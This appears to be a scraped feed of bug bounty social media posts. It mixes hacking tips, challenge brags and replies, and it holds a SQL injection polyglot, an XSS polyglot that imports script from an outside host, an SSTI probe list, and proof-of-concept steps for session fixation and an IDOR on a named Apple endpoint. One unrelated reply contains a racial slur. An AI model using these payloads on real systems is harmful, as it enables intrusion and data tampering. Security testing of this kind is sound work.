Santiko Kusnul Hakim

#SQL Injection Polyglots (Tested on MySQL & MariaDB) &1/*'/*"/**/||1#\ and-1/*'/*"/**/||1--+\ It performs injection on single and double quotes scenarios plus quoteless ones (where the injection lands in 2 consecutive points of the query). Use it in ALL input fields at once.

Session Fixation → Account Takeover POC → 1. Attacker generated a valid session ID before login 2. Sent the session link to the victim 3. Victim logged in using the same session 4. Server did not regenerate the session after authentication

Use this #XSS payload and pop alert boxes EVERYWHERE! 😎👇 JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https:X55.is/.source))}//\76-->

@ynsmroztas @yeswehack Got it. InshaAllaah i will try it

🔓 Just beat the "Dojo #49 - Secret manager" challenge on @YesWeHack! Think you can match my skills? 🌟 dojo-yeswehack.com/challenge/play… #YesWeHack #ChallengeAccepted

⚠️SSTI (Server Side Template Injection) Payload List → If evaluated as 49 - the target is vulnerable: 1. {7*7} 2. {7*7} 3. {{7*7}} 4. [[7*7]] 5. ${7*7} 6. @(7*7) 7. <?=7*7?> 8. <%= 7*7 %> 9. ${= 7*7} 10. {{= 7*7}} 11. ${{7*7}} 12. #{7*7} 13. [=7*7]

@Behi_Sec Intigriti

Which platform is the best currently? H1, Bugcrowd or Intigriti?

🚨 New Video Live 🚨 Email Uniqueness Bypass via Invisible Unicode Character Leading to Account Takeover youtu.be/YHRKyunezkA #BugBounty #CyberSecurity

here's an index of 460 common solidity vulnerabilities across 31 unique protocol types scraped from over 10000 solodit findings optimized for LLMs github.com/kadenzipfel/pr…

IDOR in APPLE 🍎 POC -> 1. Created two separate user accounts Account A (attacker), Account B (victim) on consultants.apple[.]com/publicLocator/deleteApplication consultants.apple[.]com/publicLocator/submitJoinForm 2. Logged in as Account B, submited the application form and captured the application ID of Account B 3. Now Log in as Account A and intercepted a request to the affected endpoint 4. Replaced Account A’s application ID with Account B’s application ID. 5. Forwarded the modified request 6. Server accepted the request without authorization validation 7. Logged back into Account B 8. Account B’s data is modified or deleted without consent Impact -> Any authenticated user can modify or delete other users’ data Credited to the respected owner #bugbounty #bughunting #bounty #hacking #ethicalhacking #infosec #cybersecurity #bugbountytips #bugbounty #bugbountytip #bughunting #infosecurity #OWASP #ApplicationSecurity #Bugcrowd #Hackerone #day_20

@yeswehack DevTools

What’s your favourite recon tool? 👇 #BugBountyTips

Meet VulnLLM-R-7B: a specialized AI that reads code like a security expert. It's trained to spot vulnerabilities before they become breaches. This isn't just another chatbot, it's a digital security guard for your codebase. The community is buzzing because it makes security accessible.

Baarakallaah. I just crushed the "Dojo #47 - APICrash" challenge on @YesWeHack in less than 5 minutes. dojo-yeswehack.com/challenge/play… #YesWeHack #ChallengeAccepted

@host_down @thedawgyg @DezBryant Got it. Thanks.

@getnow1986 @thedawgyg @DezBryant American Fuzzy Lop: github.com/google/AFL

The word don’t bother me.. I don’t say nigga to be rude to folks..let’s change the topic real quick.... do you have any goals in life?

🚀 **Hack Like a Pro:** Extract IPs from Shodan HTML in Seconds! 🔥 Sick of digging through HTML? Let `grep` do the work! 💻 ```bash grep -oP '(?<=).*?(?=)' ip.html > ips ``` 1️⃣ **Save Shodan page source as HTML** 2️⃣ **Run this command** 3️⃣ **BOOM 💥** — All IPs extracted to `ips`! Master your toolkit! #KaliLinux #HackingTips #CyberSecurity #Shodan #OSINT

ATO via Facebook OAuth Due Unsanitized Schema Allows to Steal OAuth Token - @OriginalSicksec sicks3c.github.io/posts/ato-via-…

@thedawgyg @host_down @DezBryant I'm so sorry before, what is "afl" as you said?

@host_down @DezBryant i used afl to fuzz a part of chromium, found them with the fuzzer. after i validated them and figured out root cause i then used a couple of agents to help me craft a poc that could trigger them from html.

"Dojo #48 - RubitMQ"? Got #pwned less than 5 minutes!💥 @YesWeHack 🌟 dojo-yeswehack.com/challenge/play… #YesWeHack #ChallengeAccepted

@HackenProof logic error issue the most

What’s the most rewarding bug you’ve caught?

hackenproof.com #hackenproofed #bugbountyYeay, baarakallaah, I was awarded for a valid "Logic Error" submission on@HackenProof This was the 12th paid report just from 1 target and 1 type of vulnerability. Got $2000 in 6 months.